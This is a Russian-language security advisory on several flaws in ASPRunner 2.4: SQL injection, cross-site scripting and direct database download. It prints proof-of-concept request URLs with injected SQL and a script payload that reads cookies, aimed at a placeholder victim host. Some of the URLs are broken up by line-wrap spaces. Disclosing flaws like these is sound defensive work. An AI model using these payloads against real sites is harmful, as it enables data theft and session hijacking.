Дата публикации: | 27.07.2004 |
Всего просмотров: | 1276 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-2058 CVE-2004-2059 CVE-2004-2060 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | ASPRunner 2.x |
Уязвимые версии: ASPRunner 2.4 и более ранние версии
Описание: Несколько уязвимостей обнаружено в ASPRunner. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может также загрузить базу данных. 1. SQL инъекция: For [TABLE]_search.asp (post): http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word _id&NeedQuoteswordid=False% 2C+False&Typewordid=3%2C+3&SearchOption=Contains& SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S earchFor=&FieldName=en&NeedQuotesen=True& Typeen=202&SearchOption=Contains&Se archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Co ntains&SearchFor= For [TABLE]_edit.asp (post): http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa geNumber=1&SQL=%22%3E%3Cscript%3Ealert %28document.cookie%29%3C%2Fscript%3Ese lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc %5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&N eedQuoteswordid=False&Ne edQuotes=&NeedQuotes=&action=view For [TABLE]_list.asp (post): http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGoto Pa ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C +++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+ like+%27%2 5&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField &SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2 9%3C%2Fscript%3E&PageSiz eSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru e&Typeen=202&NeedQuotesdesc=True&Typed esc=2032. Загрузка базы данных: http://[VICTIM]/db/[DB-FILE-NAME]3. XSS: For export.asp (post): http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29% 3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C +++%5Btr%5D%2C+++%5Ben %5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1& pagesize=20 URL производителя:http://www.xlinesoft.com/asprunner/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | ASPRunner Multiple Vulnerabilities |